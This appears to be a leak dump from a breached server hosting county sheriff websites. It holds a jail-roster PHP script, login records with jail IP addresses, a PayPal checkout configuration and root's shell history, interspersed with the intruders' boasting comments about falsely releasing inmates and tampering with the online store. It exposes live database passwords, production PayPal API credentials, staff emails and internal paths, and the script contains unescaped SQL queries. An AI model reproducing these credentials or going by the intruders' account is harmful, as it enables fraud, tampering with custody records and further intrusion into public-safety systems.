- -rw-r--r-- 1 root root 411831 Sep 13 2010 jcsoks_inamte_parse_log.txt.gz.0
- -rwxrwxrwx 1 root root 736089 Feb 8 13:44 jcsoks_query_log.txt.gz
- -rw-r--r-- 1 root root 12029931 Jul 22 22:20 johms_parse_log.txt
- -rw-r--r-- 1 root root 52276 Jun 14 13:30 johms_parse_log.txt.06142011.gz
- -rw-r--r-- 1 root root 24206 Mar 18 10:55 johms_parse_log.txt.gz
- drwxr-xr-x 2 root root 4096 Jul 22 01:00 mail_logs
- drwxr-xr-x 4 root root 4096 Jul 6 2010 parse_logs
- drwx------ 13 root root 4096 Feb 23 00:50 snapshots
- -rw-r--r-- 1 root root 3680191 Jul 22 22:21 stoms_parse_log.txt
- -rw-r--r-- 1 root root 890880 Mar 2 09:18 z
- // NOW THIS LOOKS INTERESTING
- // YOU BETTER BELIEVE WE CALLED release_inmate() MORE THAN A FEW TIMES
- # cat /var/www/vhosts/jocomosheriff.org/home/parse_roster.php
- <?
- if(date('d') == '1' && date('H') < '2'){
- shell_exec('rm /backup/johms_parse_log.txt');
- }
- function safe_query($query){
- $link = mysql_connect('localhost','johms','4smhoj2');
- mysql_select_db('JOHMS',$link);
- return mysql_query($query,$link);
- }
- function parse_csv($filename,$target_table,$field_map){
- $file = file($filename);
- $inmates = array();
- foreach($file as $line_num => $line_data){
- $query = 'INSERT INTO '.$target_table.' SET ';
- $line_data = explode(',',$line_data);
- $i=0;
- $inmates[] = $line_data[0];
- foreach($field_map as $field_num => $db_field){
- if($db_field == 'booking_date'){
- $line_data[$field_num] =
- date('Y-m-d',strtotime($line_data[$field_num])).'", booking_time =
- "'.substr($line_data[$field_num],-8).'';
- //echo $line_data[$field_num],PHP_EOL;
- }
- if($i != 0){
- $query .= ', '.$db_field.' = "'.$line_data[$field_num].'"';
- }else{
- $query .= $db_field.' = "'.$line_data[$field_num].'"';
- }
- $i++;
- }
- //echo $query,PHP_EOL;
- safe_query($query);
- unset($query);
- }
- return $inmates;
- }
- function release_inmate($booking_num){
- $date = date("Y-m-d");
- $time = date("Hi");
- $query = "update dymin_jail_roster set release_date = '$date',
- release_time = '$time' where booking_num = '$booking_num'";
- safe_query($query);
- }
- function is_in_jail($booking_number){
- $query = "select booking_num from dymin_jail_roster where booking_num =
- '$booking_number'";
- $result = safe_query($query);
- $num = mysql_num_rows($result);
- if($num == ''){return false;}else{return true;}
- }
- function build_old_inmates(){
- $inmates = array();
- $r = safe_query('SELECT * FROM dymin_jail_roster WHERE release_date =
- ""');
- while($row = mysql_fetch_array($r)){
- $inmates[] = $row['booking_num'];
- }
- return $inmates;
- }
- function build_new_inmates(){
- $inmates = array();
- $file =
- file('/var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt');
- foreach($file as $line => $data){
- $inmates[] = array_shift(explode(',',$data));
- }
- if(sizeof($inmates)<1){
- echo PHP_EOL,date('m/d/Y H:i:s'),' -- Roster File was
- Empty',PHP_EOL;
- die();
- }
- return $inmates;
- }
- function remove_old_inmates(){
- $now = time();
- $forty_eight_hours_ago = date('Y-m-d', mktime(0, 0, 0, date("m", $now)
- , date("d", $now)-2, date("Y", $now)));
- $query = "select booking_num, image1 from dymin_jail_roster where
- release_date <= '$forty_eight_hours_ago' and release_date != ''";
- $result = safe_query($query);
- while($row = mysql_fetch_array($result,MYSQL_ASSOC)){
- shell_exec('rm -f
- /var/www/vhosts/jocomosheriff.org/httpdocs/images/inmates/resized/'.$row['image1
- ']);
- $query_charges = 'delete from dymin_jail_roster_charges where
- booking_num = "'.$row['booking_num'].'"';
- safe_query($query_charges);
- $query_inmate = 'delete from dymin_jail_roster where booking_num =
- "'.$row['booking_num'].'"';
- safe_query($query_inmate);
- }
- }
- $field_map[0] = 'booking_num';
- $field_map[2] = 'age';
- $field_map[3] = 'gender';
- $field_map[4] = 'race';
- $field_map[5] = 'first_name';
- $field_map[6] = 'middle_name';
- $field_map[7] = 'last_name';
- $field_map[8] = 'booking_date';
- $field_map[9] = 'arresting_agency';
- $field_map[10] = 'image1';
- if(is_file('/var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt')
- && filesize('/var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt') !=
- '4096'){
- $OLDinmates = build_old_inmates();
- $NEWinmates = build_new_inmates();
- //print_r($OLDinmates);
- foreach($OLDinmates as $key => $booking_number){
- if(!in_array($booking_number,$NEWinmates)){
- echo $booking_number,PHP_EOL;
- print_r($NEWinmates);
- echo PHP_EOL;
- release_inmate($booking_number);
- }
- }
- safe_query('DELETE FROM dymin_jail_roster WHERE release_date = ""');
- parse_csv('/var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.
- txt','dymin_jail_roster',$field_map);
- }
- unset($field_map);
- $field_map[0] = 'booking_num';
- $field_map[1] = 'charge';
- $field_map[2] = 'bond';
- if(is_file('/var/www/vhosts/jocomosheriff.org/home/Export/
- RosterChargesExport.txt')){
- safe_query('DELETE FROM dymin_jail_roster_charges');
- safe_query('UPDATE dymin_jail_roster SET charges = "" WHERE release_date
- = ""');
- parse_csv('/var/www/vhosts/jocomosheriff.org/home/Export/
- RosterChargesExport.txt','dymin_jail_roster_charges',$field_map);
- $q = 'SELECT * FROM dymin_jail_roster_charges';
- $r = safe_query($q);
- while($row = mysql_fetch_array($r)){
- $q = 'UPDATE dymin_jail_roster SET charges =
- CONCAT(charges,"'.$row['charge'].'<br>") WHERE release_date = "" AND booking_num
- = "'.$row['booking_num'].'"';
- safe_query($q);
- //echo $q,PHP_EOL;
- }
- $q = 'SELECT * FROM dymin_jail_roster';
- $r = safe_query($q);
- while($row = mysql_fetch_array($r,MYSQL_ASSOC)){
- $q = 'UPDATE dymin_jail_roster SET bond = (SELECT sum(bond) FROM
- dymin_jail_roster_charges WHERE booking_num = "'.$row['booking_num'].'") WHERE
- booking_num = "'.$row['booking_num'].'" AND release_date = ""';
- safe_query($q);
- //echo $q,PHP_EOL;
- }
- }
- remove_old_inmates();
- if(is_file('/var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt')
- ){
- $file = '/var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt';
- $newfile =
- '/var/www/vhosts/jocomosheriff.org/home/export_backup/RosterExport_'.date('
- Y_m_d_His').'.txt';
- if (!copy($file, $newfile)) {
- echo "failed to copy $file...\n";
- }else{
- unlink('/var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.
- txt');
- if(is_file('/var/www/vhosts/jocomosheriff.org/home/Export/
- RosterChargesExport.txt')){
- unlink('/var/www/vhosts/jocomosheriff.org/home/Export/
- RosterChargesExport.txt');
- }
- }
- }
- //shell_exec('cp -rpufT
- /var/www/vhosts/jocomosheriff.org/home/Export/Images/
- /var/www/vhosts/jocomosheriff.org/httpdocs/images/inmates/resized/');
- //shell_exec('mogrify -resize 200x200
- /var/www/vhosts/jocomosheriff.org/home/Export/Images/*.jpg');
- //shell_exec('mogrify -resize 200x200
- /var/www/vhosts/jocomosheriff.org/httpdocs/images/inmates/resized/*.jpg');
- shell_exec('chmod -R 777
- /var/www/vhosts/jocomosheriff.org/httpdocs/images/inmates/resized/');
- shell_exec('chown -R root:root
- /var/www/vhosts/jocomosheriff.org/httpdocs/images/inmates/resized');
- $files = scandir('/var/www/vhosts/jocomosheriff.org/home/Export/Images/');
- foreach($files as $k => $v){
- if(strpos($v,'.JPG') !== false || strpos($v,'.jpg') !== false){
- $q = 'SELECT * FROM dymin_jail_roster WHERE image1 LIKE "%'.$v.'%"';
- if(mysql_num_rows(safe_query($q)) > 0){
- if(!is_file('/var/www/vhosts/jocomosheriff.org/httpdocs/images/
- inmates/resized/'.$v)){
- shell_exec('cp -rpufT
- /var/www/vhosts/jocomosheriff.org/home/Export/Images/'.$v.'
- /var/www/vhosts/jocomosheriff.org/httpdocs/images/inmates/resized/'.$v);
- echo 'Copied -
- '.'/var/www/vhosts/jocomosheriff.org/home/Export/Images/'.$v.' TO
- /var/www/vhosts/jocomosheriff.org/httpdocs/images/inmates/resized/'.$v.PHP_EOL;
- }
- }else{
- //do nothing for now
- }
- }
- //echo $v.'<br>';
- }
- $files =
- scandir('/var/www/vhosts/jocomosheriff.org/httpdocs/images/inmates/resized/');
- foreach($files as $k => $v){
- if(strpos($v,'.JPG') !== false || strpos($v,'.jpg') !== false){
- $q = 'SELECT * FROM dymin_jail_roster WHERE image1 LIKE "%'.$v.'%"';
- if(mysql_num_rows(safe_query($q)) > 0){
- echo $v.' - Valid Image'.PHP_EOL;
- shell_exec('mogrify -resize 200x200
- /var/www/vhosts/jocomosheriff.org/httpdocs/images/inmates/resized/'.$v);
- }else{
- //shell_exec('rm -f
- /var/www/vhosts/jocomosheriff.org/httpdocs/images/inmates/resized/'.$v);
- //shell_exec('rm -f
- /var/www/vhosts/jocomosheriff.org/home/Export/'.$v);
- echo 'Removing - '.$v.PHP_EOL;
- }
- }
- //echo $v.'<br>';
- }
- echo PHP_EOL,date('m/d/Y H:i:s'),' -- Finished',PHP_EOL;
- ?>
- # last > last.txt; wc last.txt
- 78726 787247 6061786 last.txt
- // WHY YES THESE ARE JAIL IPS SYNCING THEIR INMATE ROSTER FILES TO THE WEB
- # head -n 5 last.txt
- jonms_sy ftpd8479 173.166.203.165 Sat Jul 23 14:43 - 14:43 (00:00)
- pcsoks_s ftpd8064 24.248.200.101 Sat Jul 23 14:40 - 14:40 (00:00)
- pcsoks_s ftpd8056 24.248.200.101 Sat Jul 23 14:40 - 14:40 (00:00)
- pcsoks_s ftpd8054 24.248.200.101 Sat Jul 23 14:40 - 14:40 (00:00)
- jonms_sy ftpd3730 173.166.203.165 Sat Jul 23 14:28 - 14:28 (00:00)
- // JUST IN CASE ANYONE WANTED TO PLAY WITH THEIR ONLINE STORE. WE SURE DID
- # cat /var/www/vhosts/mosheriffs.com/httpdocs/checkout/constants.php
- <?php
- define('API_TEST_MODE',false);
- /****************************************************
- constants.php
- This is the configuration file for the samples.This file
- defines the parameters needed to make an API call.
- PayPal includes the following API Signature for making API
- calls to the PayPal sandbox:
- API Username sdk-three_api1.sdk.com
- API Password QFZCWN5HZM8VBG7Q
- API Signature A-IzJhZZjhg29XQ2qnhapuwxIDzyAZQ92FRP5dqBzVesOkzbdUONzmOU
- Called by CallerService.php.
- ****************************************************/
- /**
- # API user: The user that is identified as making the call. you can
- # also use your own API username that you created on PayPal�s sandbox
- # or the PayPal live site
- */
- if(!API_TEST_MODE){
- define('API_USERNAME', 'info_api1.mosheriffs.com');
- }else{
- define('API_USERNAME', 'galexa_1252510976_biz_api1.bjmweb.com');
- }
- /**
- # API_password: The password associated with the API user
- # If you are using your own API username, enter the API password that
- # was generated by PayPal below
- # IMPORTANT - HAVING YOUR API PASSWORD INCLUDED IN THE MANNER IS NOT
- # SECURE, AND ITS ONLY BEING SHOWN THIS WAY FOR TESTING PURPOSES
- */
- if(!API_TEST_MODE){
- define('API_PASSWORD', 'X376UUNKW9C665M5');
- }else{
- define('API_PASSWORD', '1252510985');
- }
- /**
- # API_Signature:The Signature associated with the API user. which is generated
- by paypal.
- */
- if(!API_TEST_MODE){
- define('API_SIGNATURE',
- 'AJabrMjdeOUS3ztu4b5tguA358YTAyJmntUHr637CjsXE1pjKGM9MsOH');
- }else{
- define('API_SIGNATURE',
- 'AFcWxV21C7fd0v3bYYYRCpSSRl31AmSHW7t6qw42Zz2AE42uyKKvCZBA');
- }
- /**
- # Endpoint: this is the server URL which you have to connect for submitting your
- API request.
- */
- if(!API_TEST_MODE){
- define('API_ENDPOINT', 'https://api-3t.paypal.com/nvp');
- }else{
- define('API_ENDPOINT', 'https://api-3t.sandbox.paypal.com/nvp');
- }
- /**
- USE_PROXY: Set this variable to TRUE to route all the API requests through
- proxy.
- like define('USE_PROXY',TRUE);
- */
- define('USE_PROXY',FALSE);
- /**
- PROXY_HOST: Set the host name or the IP address of proxy server.
- PROXY_PORT: Set proxy port.
- PROXY_HOST and PROXY_PORT will be read only if USE_PROXY is set to TRUE
- */
- define('PROXY_HOST', '127.0.0.1');
- define('PROXY_PORT', '808');
- /* Define the PayPal URL. This is the URL that the buyer is
- first sent to to authorize payment with their paypal account
- change the URL depending if you are testing on the sandbox
- or going to the live PayPal site
- For the sandbox, the URL is
- https://www.sandbox.paypal.com/webscr&cmd=_express-checkout&token=
- For the live site, the URL is
- https://www.paypal.com/webscr&cmd=_express-checkout&token=
- */
- define('PAYPAL_URL',
- 'https://www.sandbox.paypal.com/webscr&cmd=_express-checkout&token=');
- /**
- # Version: this is the API version in the request.
- # It is a mandatory parameter for each API request.
- # The only supported value at this time is 2.3
- */
- define('VERSION', '59.0');
- ?><?
- session_start();
- include "../config/header.php";
- include "../admin/config/classes/training_academy.php";
- $ta = new training_class('academy');
- $page = new training_class('academy');
- ?>
- // HERE COMES THE BORING PART
- # cat ~root/.bash_history
- less
- /var/www/vhosts/crosscountysheriff.org/httpdocs/admin/modules/warrants/classes/
- warrant_parser.php
- ll
- cd /var/www/vhosts/stfranciscountysheriff.org/
- ll
- cd home/
- ll
- crontab -l
- crontab -l
- /usr/bin/php /var/www/vhosts/stfranciscountysheriff.org/home/warrant_parser.php
- ll
- cd /var/log/
- ll
- less messages | grep 'sfsoar'
- less messages | grep 'sf
- '
- less messages | grep 'stfrancis'
- less messages | grep '16610'
- less messages | grep 'Cross County'
- less messages | grep 'crosscounty'
- less messages | grep 'stfrancis'
- less messages | grep 'boonesheriff'
- l
- ll
- less secure | grep 'sfsoar'
- cd /var/www/vhosts/crosscountysheriff.org/
- cd home/
- ll
- cd Cross\ County/
- ll
- pwd
- cd /var/sql_logs/
- ll
- ll -h
- mkdir -m 755 backup
- ll
- gzip baxtercountysheriff.com
- ll
- gzip mosheriffs.com
- ll
- ll
- mv mosheriffs.com.gz backup/
- ll
- mv baxtercountysheriff.com.gz backup/
- ll
- cd backup/
- ll
- ll -h
- cd ..
- ll
- ll -h
- ll
- cd /var/www/vhosts/jocomosheriff.org/
- cd home/
- ll
- ll
- cd Export/
- ll
- cd Images/
- ll
- cd ..
- ll
- cd ..
- ll
- crontab -l
- /usr/bin/php /var/www/vhosts/jocomosheriff.org/home/parse_roster.php
- ll
- vi parse_roster.php
- cd Export/
- ll
- cd Images/
- ll
- cd ..
- cd ..
- ll
- cd /var/www/vhosts/boonesheriff.com/
- ll
- cd home/
- ll
- less ActiveWarrantsList.txt
- top
- cd /var/www/vhosts/jocomosheriff.org/home/
- ll
- cd Export/
- ll
- cd ..
- ll
- vi parse_roster.php
- /usr/bin/php /var/www/vhosts/jocomosheriff.org/home/parse_roster.php
- vi /var/www/vhosts/jocomosheriff.org/home/parse_roster.php
- /usr/bin/php /var/www/vhosts/jocomosheriff.org/home/parse_roster.php
- /usr/bin/php /var/www/vhosts/jocomosheriff.org/home/parse_roster.php
- /usr/bin/php /var/www/vhosts/jocomosheriff.org/home/parse_roster.php
- cd /var/www/vhosts/crosscountysheriff.org/
- ll
- cd home/
- ll
- cd Cross\ County/
- ll
- cd ..
- ll
- cd Cross\ County/
- ll
- less warrant_parser.php
- cd /backup
- ll
- mkdir -m 777 CRCSD_WARRANTS
- ll
- cd CRCSD_WARRANTS/
- ll
- pwd
- ll
- ll
- crontab -l
- /usr/bin/php /var/www/vhosts/crosscountysheriff.org/home/Cross\
- County/warrant_parser.php
- ll
- less warrant_query.sql
- cd ..
- ll
- pwd
- /usr/bin/php /var/www/vhosts/crosscountysheriff.org/home/Cross\
- County/warrant_parser.php
- /usr/bin/php /var/www/vhosts/crosscountysheriff.org/home/Cross\
- County/warrant_parser.php
- cd CRCSD_WARRANTS/
- ll
- rm warrant_query.sql
- cd ..
- ll
- rm warrant_query.sql
- ll
- cd CRCSD_WARRANTS/
- ll
- ll
- ll -h
- ll
- ll
- ll
- cd ..
- mkdir -m 777 BOCS_WARRANTS
- ll
- mkdir -m 777 SFSOAR_WARRANTS
- ll
- du -sh
- du -sh ./
- du -sh ./*
- ll
- ll
- cd SFSOAR_WARRANTS/
- ll
- ll
- ll
- ll
- ll
- ll
- ll
- crontab -l
- /usr/bin/php /var/www/vhosts/stfranciscountysheriff.org/home/warrant_parser.php
- crontab -e
- ll
- cd /var/www/vhosts/crosscountysheriff.org/home/
- ll
- cd Cross\ County/
- ll
- ll -h
- ll
- ll
- crontab -l
- /usr/bin/php /var/www/vhosts/crosscountysheriff.org/home/Cross\
- County/warrant_parser.php
- crontab -l
- /usr/bin/php /var/www/vhosts/boonesheriff.com/home/warrant_parser.php >/dev/null
- 2>&1
- ll
- cd /var/www/vhosts/boonesheriff.com/home/
- ll
- /usr/bin/php /var/www/vhosts/boonesheriff.com/home/warrant_parser.php
- ll
- /usr/bin/php /var/www/vhosts/boonesheriff.com/home/warrant_parser.php
- crontab -e
- postqueue -p
- postqueue -p
- postqueue -f
- ll
- ll
- less huh
- ll -rt
- ll -h
- ll -rth
- top
- ll
- less tat\ E
- postqueue -p
- postqueue -p
- postqueue -p
- postqueue -f
- postqueue -f
- postqueue -p
- postqueue -p
- postqueue -p
- postqueue -p
- postqueue -f
- postqueue -p
- postqueue -f
- postqueue -p
- postqueue -f
- postqueue -p
- postqueue -f
- postqueue -p
- postqueue -f
- postqueue -p
- postqueue -p
- postqueue -p
- postqueue -p
- postqueue -p
- postqueue -p
- postqueue -p
- postqueue -p
- postqueue -p
- postqueue -f
- postqueue -p
- top
- postqueue -p
- postqueue -p
- postqueue -p
- postqueue -p
- postqueue -p
- ls
- cd bin
- ls
- cd ../scripts/
- ls
- rm logon.aspx\?url\=https\:%2F%2Fwebmail.bjmweb.com%2Fowa%2F\&reason\=0
- rm logon.aspx\?url\=https\:%2F%2Fwebmail.bjmweb.com%2Fowa%2F\&reason\=0
- ./backup-now.sh
- cd
- ls
- rm BACKUP092010.csv.gz
- less recaptcha.log
- less recaptchalib.php
- for i in $(cat recaptcha.log); do echo $i; done
- for i in $(cat recaptcha.log); do ls -al $i; done
- for i in $(cat recaptcha.log); do ls -al $i; done > perms.log
- for i in $(cat recaptcha.log| grep recaptchalib.php); do echo $i; done
- for i in $(cat recaptcha.log| grep recaptchalib.php); do echo $i; done| wc -l
- wc -l perms.log
- for i in $(cat recaptcha.log| grep recaptchalib.php); do echo $il cat
- recaptchalib.php > $i; done
- for i in $(cat recaptcha.log| grep recaptchalib.php); do echo $i; cat
- recaptchalib.php > $i; done
- ll /var/www/vhosts/georgecountymssheriff.com/httpdocs/recaptchalib.php
- less /var/www/vhosts/randolphcountysheriff.org/httpdocs/recaptchalib.php
- cd /var/www/vhosts/crosscountysheriff.org/home
- ll
- cd Cross\ County/
- ll
- less parse_pcv.php
- ll
- vi test.txt
- ll
- less parse_pcv.php
- ll
- crontab -l
- /usr/bin/php /var/www/vhosts/crosscountysheriff.org/home/Cross\
- County/parse_pcv.php
- top
- vi test.txt
- vi test.txt
- /usr/bin/php /var/www/vhosts/crosscountysheriff.org/home/Cross\
- County/parse_pcv.php
- cd images/
- ll
- cp *.jpg /var/www/vhosts/crosscountysheriff.org/httpdocs/images/inmates/
- cp -f *.jpg /var/www/vhosts/crosscountysheriff.org/httpdocs/images/inmates/
- \cp -f *.jpg /var/www/vhosts/crosscountysheriff.org/httpdocs/images/inmates/
- cd ..
- ll
- ll
- vi test.txt
- ll
- cd .
- cd ..
- ll
- less pop_update.txt
- cd /var/www/vhosts/stfranciscountysheriff.org/
- ll
- cd home/
- ll
- less check_population.php
- cd /var/www/vhosts/crosscountysheriff.org/home/Cross\ County/
- pwd
- ll
- ll
- ll
- ll
- top
- ll
- ll
- cd ..
- l
- ll
- cd Cross\ County/
- ll
- less Jun
- ll
- ll
- ll
- cd ..
- ll
- vi check_population.php
- php check_population.php
- vi check_population.php
- php check_population.php
- cd Cross\ County/
- ll
- less Population.txt
- cd..
- cd ..
- php check_population.php
- php check_population.php > Cross\ County/test.txt
- crontab -l
- /usr/bin/php /var/www/vhosts/crosscountysheriff.org/home/Cross\
- County/parse_pcv.php
- cd Cross\ County/
- ll
- vi test.txt
- /usr/bin/php /var/www/vhosts/crosscountysheriff.org/home/Cross\
- County/parse_pcv.php
- vi inmate_class.php
- vi inmate_class.php
- top
- top
- postqueue -p
- postqueue -p
- postqueue -p
- postqueue -p
- postqueue -p
- postqueue -p
- postqueue -p
- postqueue -p
- top
- postqueue -p
- top
- cd /var/www/vhosts/johnsoncosheriff.com/home
- cd /var/www/vhosts/jocomosheriff.org/home/
- ll
- cd export_backup/
- ll
- ll -rt
- cd ..
- ll
- cd Export/
- ll
- cd Images/
- ll
- ll -rt
- cd ..
- cd ..
- ll
- cd export_backup/
- ll
- cd ..
- ll
- less parse_roster.php
- ll
- cd export_backup/
- ll
- top
- crontab -l
- less
- /var/www/vhosts/mostwantedwebsites.net/subdomains/code/httpdocs/search/cron.sh
- cd /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/ &&
- /usr/bin/php
- /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/spider.php
- -u http://crosscountysheriff.org/ -r -n
- http://crosscountysheriff.org/warrants.php?find=all
- crontab -e
- crontab -l
- cd /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/ &&
- /usr/bin/php
- /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/spider.php
- -u http://crosscountysheriff.org/ -r -n
- http://www.crosscountysheriff.org/warrants/view/all
- cd /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/ &&
- /usr/bin/php
- /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/spider.php
- -u http://crosscountysheriff.org/ -r -n
- http://www.crosscountysheriff.org/warrants/view/all \n cd
- http://www.crosscountysheriff.org/index.php?a=warrants&v=view&id=all
- cd /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/ &&
- /usr/bin/php
- /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/spider.php
- -u http://crosscountysheriff.org/ -r -n
- http://www.crosscountysheriff.org/warrants/view/all \n
- http://www.crosscountysheriff.org/index.php?a=warrants&v=view&id=all
- cd /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/ &&
- /usr/bin/php
- /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/spider.php
- -u http://crosscountysheriff.org/ -r -n
- http://www.crosscountysheriff.org/warrants/view/all \n
- http://www.crosscountysheriff.org/index.php?a=warrants&v=view&id=all
- cd /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/ &&
- /usr/bin/php
- /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/spider.php
- -u http://crosscountysheriff.org/ -r -n
- http://www.crosscountysheriff.org/warrants/view/all \n
- http://www.crosscountysheriff.org/index.php?a=warrantsv=viewid=all
- cd /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/ &&
- /usr/bin/php
- /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/spider.php
- -u http://crosscountysheriff.org/ -r -n
- http://www.crosscountysheriff.org/warrants/view/all \n
- http://www.crosscountysheriff.org/index.php
- cd /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/ &&
- /usr/bin/php
- /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/spider.php
- -u http://crosscountysheriff.org/ -r
- cd /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/ &&
- /usr/bin/php
- /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/spider.php
- -u http://crosscountysheriff.org/ -r -n
- http://www.crosscountysheriff.org/warrants/view/all\nhttp://www.
- crosscountysheriff.org/index.php
- top
- lsof -p 20452
- kill 20452
- lsof -p 20452
- top
- lsof -p 32631
- kill 32631
- lsof -p
- lsof -p 32631
- top
- lsof -p 5852
- top
- su - mstapleton
- ll
- cd /var/www/vhosts/kansassheriffs.org/uploads/
- cd /var/www/vhosts/kansassheriffs.org/
- ll
- cd /httpdocs/
- cd /va
- cd /var/www/vhosts/kansassheriffs.org/httpdocs/
- ll
- cd /uploads/
- cd uploads/
- ll
- cd /var/www/vhosts/kssa.mostwantedwebsites.net/httpdocs/uploads/
- ll
- ../
- ll
- cd ../
- ll
- chown -R root:root uploads/
- ll
- cd uploads/
- ll
- cd ../
- ll
- chown -R kssa2 uploads/
- ll
- chown -R kssa2:kssa2 uploads/
- ll
- logout
- cd /var/www/vhosts/kssa.mostwantedwebsites.net/httpdocs/
- ll
- cd ../
- ll
- cd httpdocs/
- ll
- rm -R httpdocs/
- cd ../
- ll
- rm -R httpdocs/
- y
- y
- y
- y
- y
- y
- y
- y
- ll
- cd httpdocs/
- ll
- cd /var/www/vhosts/kansassheriffs.org/httpdocs/
- ll
- crontab -e
- logout
- cd /var/www/vhosts/kssa.mostwantedwebsites.net/httpdocs/
- ll
- cd ../
- ll
- rm -f httpdocs/
- rm -R httpdocs/
- ll
- cd httpdocs/
- ll
- ../
- cd ../
- ll
- rm -r httpdocs/
- y
- y
- y
- y
- y
- y
- y
- y
- ll
- rm -R httpdocs/
- y
- ll
- logout
- crontab -l
- cd /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/ &&
- /usr/bin/php
- /var/www/vhosts/crosscountysheriff.org/httpdocs/helpers/search/admin/spider.php
- -u http://crosscountysheriff.org/ -r -n
- http://www.crosscountysheriff.org/warrants/view/all
- cd /var/www/vhosts/howardcountysheriffar.com/
- ll
- cd httpdocs/
- ll
- ll
- cd ..
- cd home/
- ll
- touch test.txt
- vi test.txt
- ll
- vi test.txt
- ll
- crontab -l
- /usr/bin/php /var/www/vhosts/howardcountysheriffar.com/home/parse_pcv.php
- >/dev/null 2>&1
- ll
- yum info php
- w
- top
- ps -ef | grep httpd
- w
- w
- w
- top
- top
- ps -ef
- ps -ef
- w
- iostat
- top
- ps -ef | grep bp
- kill 6144
- top
- crontab -l
- ps -ef | grep imap
- cd /etc/
- w
- top
- ps -ef | grep php
- ls /etc/init.d
- chkconfig --list
- runlevel
- /etc/init.d/postfix restart
- bg
- ps -ef | grep bp
- date
- kill 31287
- top
- ps -ef
- /etc/init.d/postfix start
- ps -ef| grep imap
- ps -ef| grep post
- less /usr/local/psa/var/log/maillog
- mail jwiegand@bjmweb.com
- less /usr/local/psa/var/log/maillog
- mailq
- man bpbark
- top
- ps -ef | grep my
- ps -ef | grep mysql
- ps -ef | less
- top
- ps -ef | grep php
- cd
- ls
- cd bin/
- ls
- cd ../scripts/
- ls
- ./backup-now.sh
- top
- ps -ef
- top
- ps -ef | grep psa
- ps -ef |grep sp
- pkill spider
- ps -ef |grep sp
- kill 6624 6644 18573
- ps -ef |grep sp
- ps -ef |grep spider
- kill 11673 11717 18605
- ps -ef |grep spider
- top
- top
- nn
- cd /var/www/vhosts/
- ls
- cd jacksonsheriff.org/
- find . -name tiny_mce
- find . -name tinymce
- ls admin
- cd httpdocs/
- ls
- ls admin
- find .
- find .| less
- cd ../../crosscountysheriff.org/
- cd httpdocs/
- ls
- find . -name tiny\*
- less ./admin/tinymce/jscripts/tiny_mce/tiny_mce.js
- mv ./admin/config/functions/tiny_mce.php
- ./admin/config/functions/tiny_mce.php_bak
- mv ./admin/tinymce/jscripts/tiny_mce ./admin/tinymce/jscripts/tiny_mce_bak
- cp ~/tiny_mce.php ./admin/config/functions/tiny_mce.php
- cp -rv ~/tiny_mce ./admin/tinymce/jscripts/tiny_mce
- cd ../..
- find . -type d -name wp-admin
- pwd
- cd ../..
- cd www/vhosts/
- ls
- cd crosscountysheriff.org/
- ls
- cd httpdocs/admin/
- ls
- ll
- history
- ls
- ll tinymce/
- ls
- ll config/
- ll config/functions/
- cd config/functions/
- ll
- diff tiny_mce.php tiny_mce.php_bak
- ls
- mv tiny_mce.php tiny_mce.php_new
- mv tiny_mce.php_bak tiny_mce.php
- cd ../
- ls
- cd ..
- ls
- history
- cd tinymce/jscripts/
- ll
- mv tiny_mce tiny_mce_new
- mv tiny_mce_bak tiny_mce
- top
- lsof -p 9043
- kill 9043
- lsof -p 9043
- cd /var/log
- ls
- less rsnapshot
- less rsnapshot
- cd /var/www/vhosts/crosscountysheriff.org/
- cd statistics/
- ls
- less logs/access_log
- cd /var/www/vhosts/baxtercountysheriff.com/
- ls
- cd httpdocs/
- cd admin_dymin/
- ls
- find . -name ping.php
- ll
- cd /var/www/vhosts/stonecountymosheriff.com/
- ll
- cd httpdocs/
- ll
- cd ..
- cd home/
- ll
- cd export_backup/
- ll
- crontab -l
- crontab -e
- crontab -l
- cd /var/www/vhosts/stonecountymosheriff.com/
- cd home/
- ll
- cd export_backup/
- ll
- top
- cd /var/www/vhosts/jocomosheriff.org/
- ll
- cd home/
- ll
- cd Export/
- ll
- cd ../export_backup/
- ll
- cd ..
- ll
- vi parse_roster.php
- crontab -l
- vi /backup/johms_parse_log.txt
- ll
- less clean.php
- ll
- cd export_backup/
- ll
- rm -f RosterExport_2011_01* RosterExport_2011_02* RosterExport_2011_03*
- RosterExport_2011_04* RosterExport_2011_05*
- rm -f RosterExport_2011_01*
- rm -f RosterExport_2011_02*
- rm -f RosterExport_2011_03*
- rm -f RosterExport_2011_04*
- rm -f RosterExport_2011_05*
- rm -f RosterExport_2011_05*
- rm -f RosterExport_2011_05_0*
- rm -f RosterExport_2011_05*
- rm -f RosterExport_2011_06*
- ll
- ll
- ll
- ll
- cd ..
- ll
- vi parse_roster.php
- ll
- ll
- ll
- cd Export/
- ll
- cd Images/
- ll
- *.txt
- ll | less
- ll
- cd ..
- ll
- cd ..
- ll
- less parse_roster.php
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
- less /var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt
